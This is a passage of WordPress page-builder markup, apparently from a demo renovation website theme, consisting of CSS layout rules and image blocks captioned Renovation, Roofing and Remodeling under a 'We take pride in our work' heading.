{\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a19622af-a9ea-4656-b081-4379c93e441d\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">We take pride in <br>our work</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"19143050-2e10-4de7-a8d5-736c76cd2719\",\"topPadding\":40,\"opacity\":0,\"className\":\"gb-renovation-our-work\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-our-work skt-blocks-block-section-outer-wrap block-19143050-2e10-4de7-a8d5-736c76cd2719 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-19143050-2e10-4de7-a8d5-736c76cd2719 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-19143050-2e10-4de7-a8d5-736c76cd2719 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-19143050-2e10-4de7-a8d5-736c76cd2719 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-19143050-2e10-4de7-a8d5-736c76cd2719.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-19143050-2e10-4de7-a8d5-736c76cd2719.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-19143050-2e10-4de7-a8d5-736c76cd2719.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-19143050-2e10-4de7-a8d5-736c76cd2719.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-19143050-2e10-4de7-a8d5-736c76cd2719.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-19143050-2e10-4de7-a8d5-736c76cd2719 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-19143050-2e10-4de7-a8d5-736c76cd2719 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-19143050-2e10-4de7-a8d5-736c76cd2719.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-19143050-2e10-4de7-a8d5-736c76cd2719 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-19143050-2e10-4de7-a8d5-736c76cd2719.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-19143050-2e10-4de7-a8d5-736c76cd2719 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-19143050-2e10-4de7-a8d5-736c76cd2719.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"opacity\":0,\"blockId\":\"a7e2721a-8217-4a26-9f59-592e71a3f440\"} -->\n<style type=\"text/css\"> .block-a7e2721a-8217-4a26-9f59-592e71a3f440 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a7e2721a-8217-4a26-9f59-592e71a3f440 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a7e2721a-8217-4a26-9f59-592e71a3f440 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a7e2721a-8217-4a26-9f59-592e71a3f440 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a7e2721a-8217-4a26-9f59-592e71a3f440 .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a7e2721a-8217-4a26-9f59-592e71a3f440 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a7e2721a-8217-4a26-9f59-592e71a3f440 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a7e2721a-8217-4a26-9f59-592e71a3f440 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"leftMargin\":10,\"rightMargin\":10,\"leftMarginTablet\":5,\"rightMarginTablet\":5,\"blockId\":\"7bd3347a-a750-4faf-8061-57486134d0cf\"} -->\n<style type=\"text/css\"> .block-7bd3347a-a750-4faf-8061-57486134d0cf .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7bd3347a-a750-4faf-8061-57486134d0cf .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7bd3347a-a750-4faf-8061-57486134d0cf .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 976px){\n .block-7bd3347a-a750-4faf-8061-57486134d0cf .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 5px; margin-right: 5px; }\n}\n @media only screen and (max-width: 767px){\n .block-7bd3347a-a750-4faf-8061-57486134d0cf .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7bd3347a-a750-4faf-8061-57486134d0cf\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":36,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1.jpg\" alt=\"\" class=\"wp-image-36\"/><figcaption>Renovation</figcaption></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"leftMargin\":10,\"rightMargin\":10,\"leftMarginTablet\":5,\"rightMarginTablet\":5,\"blockId\":\"da6a997d-e4f7-4be0-b480-7f881d1d4654\"} -->\n<style type=\"text/css\"> .block-da6a997d-e4f7-4be0-b480-7f881d1d4654 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-da6a997d-e4f7-4be0-b480-7f881d1d4654 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-da6a997d-e4f7-4be0-b480-7f881d1d4654 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 976px){\n .block-da6a997d-e4f7-4be0-b480-7f881d1d4654 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 5px; margin-right: 5px; }\n}\n @media only screen and (max-width: 767px){\n .block-da6a997d-e4f7-4be0-b480-7f881d1d4654 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-da6a997d-e4f7-4be0-b480-7f881d1d4654\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":34,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2.jpg\" alt=\"\" class=\"wp-image-34\"/><figcaption>Roofing</figcaption></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"leftMargin\":10,\"rightMargin\":10,\"leftMarginTablet\":5,\"rightMarginTablet\":5,\"blockId\":\"4d6ea7d7-259a-40e0-bc7d-4018397a5a60\"} -->\n<style type=\"text/css\"> .block-4d6ea7d7-259a-40e0-bc7d-4018397a5a60 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-4d6ea7d7-259a-40e0-bc7d-4018397a5a60 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-4d6ea7d7-259a-40e0-bc7d-4018397a5a60 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 976px){\n .block-4d6ea7d7-259a-40e0-bc7d-4018397a5a60 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 5px; margin-right: 5px; }\n}\n @media only screen and (max-width: 767px){\n .block-4d6ea7d7-259a-40e0-bc7d-4018397a5a60 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-4d6ea7d7-259a-40e0-bc7d-4018397a5a60\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":35,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3.jpg\" alt=\"\" class=\"wp-image-35\"/><figcaption>Remodeling</figcaption></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":3,\"opacity\":0,\"blockId\":\"91a5e1b5-56d9-4b18-8934-c09dfd14060a\"} -->\n<style type=\"text/css\"> .block-91a5e1b5-56d9-4b18-8934-c09dfd14060a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-91a5e1b5-56d9-4b18-8934-c09dfd14060a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-91a5e1b5-56d9-4b18-8934-c09dfd14060a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-91a5e1b5-56d9-4b18-8934-c09dfd14060a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-91a5e1b5-56d9-4b18-8934-c09dfd14060a .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-91a5e1b5-56d9-4b18-8934-c09dfd14060a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-91a5e1b5-56d9-4b18-8934-c09dfd14060a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-91a5e1b5-56d9-4b18-8934-c09dfd14060a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"leftMargin\":10,\"rightMargin\":10,\"leftMarginTablet\":5,\"rightMarginTablet\":5,\"blockId\":\"c55f6d1c-317a-478c-adb1-6f0149064400\"} -->\n<style type=\"text/css\"> .block-c55f6d1c-317a-478c-adb1-6f0149064400 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-c55f6d1c-317a-478c-adb1-6f0149064400 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-c55f6d1c-317a-478c-adb1-6f0149064400 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 976px){\n .block-c55f6d1c-317a-478c-adb1-6f0149064400 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 5px; margin-right: 5px; }\n}\n @media only screen and (max-width: 767px){\n .block-c55f6d1c-317a-478c-adb1-6f0149064400 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-c55f6d1c-317a-478c-adb1-6f0149064400\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":36,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1.jpg\" alt=\"\" class=\"wp-image-36\"/><figcaption>Renovation</figcaption></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"leftMargin\":10,\"rightMargin\":10,\"leftMarginTablet\":5,\"rightMarginTablet\":5,\"blockId\":\"0849eb91-2d02-4000-b9c3-8f67c635097b\"} -->\n<style type=\"text/css\"> .block-0849eb91-2d02-4000-b9c3-8f67c635097b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0849eb91-2d02-4000-b9c3-8f67c635097b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0849eb91-2d02-4000-b9c3-8f67c635097b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 976px){\n .block-0849eb91-2d02-4000-b9c3-8f67c635097b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 5px; margin-right: 5px; }\n}\n @media only screen and (max-width: 767px){\n .block-0849eb91-2d02-4000-b9c3-8f67c635097b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0849eb91-2d02-4000-b9c3-8f67c635097b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":34,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2.jpg\" alt=\"\" class=\"wp-image-34\"/><figcaption>Roofing</figcaption></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"leftMargin\":10,\"rightMargin\":10,\"leftMarginTablet\":5,\"rightMarginTablet\":5,\"blockId\":\"172b21cf-d017-4e19-b683-c1f3c4f4fd08\"} -->\n<style type=\"text/css\"> .block-172b21cf-d017-4e19-b683-c1f3c4f4fd08 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-172b21cf-d017-4e19-b683-c1f3c4f4fd08 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-172b21cf-d017-4e19-b683-c1f3c4f4fd08 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 976px){\n .block-172b21cf-d017-4e19-b683-c1f3c4f4fd08 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 5px; margin-right: 5px; }\n}\n @media only screen and (max-width: 767px){\n .block-172b21cf-d017-4e19-b683-c1f3c4f4fd08 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-172b21cf-d017-4e19-b683-c1f3c4f4fd08\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":35,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3.jpg\" alt=\"\" class=\"wp-image-35\"/><figcaption>Remodeling</figcaption></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"23a8b88a-6903-4241-b8a8-5522e75cbcb1\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-23a8b88a-6903-4241-b8a8-5522e75cbcb1 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-23a8b88a-6903-4241-b8a8-5522e75cbcb1.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"40f9de98-7901-4d12-9702-eba819a8af91\"} -->\n<style type=\"text/css\"> .block-40f9de98-7901-4d12-9702-eba819a8af91 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-40f9de98-7901-4d12-9702-eba819a8af91 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-40f9de98-7901-4d12-9702-eba819a8af91 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-40f9de98-7901-4d12-9702-eba819a8af91 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-40f9de98-7901-4d12-9702-eba819a8af91 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-40f9de98-7901-4d12-9702-eba819a8af91 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-40f9de98-7901-4d12-9702-eba819a8af91 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-40f9de98-7901-4d12-9702-eba819a8af91 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"a700bb13-4eda-4e5c-8be7-967307f8fe21\"} -->\n<style type=\"text/css\"> .block-a700bb13-4eda-4e5c-8be7-967307f8fe21 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-a700bb13-4eda-4e5c-8be7-967307f8fe21 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-a700bb13-4eda-4e5c-8be7-967307f8fe21 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-a700bb13-4eda-4e5c-8be7-967307f8fe21 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media 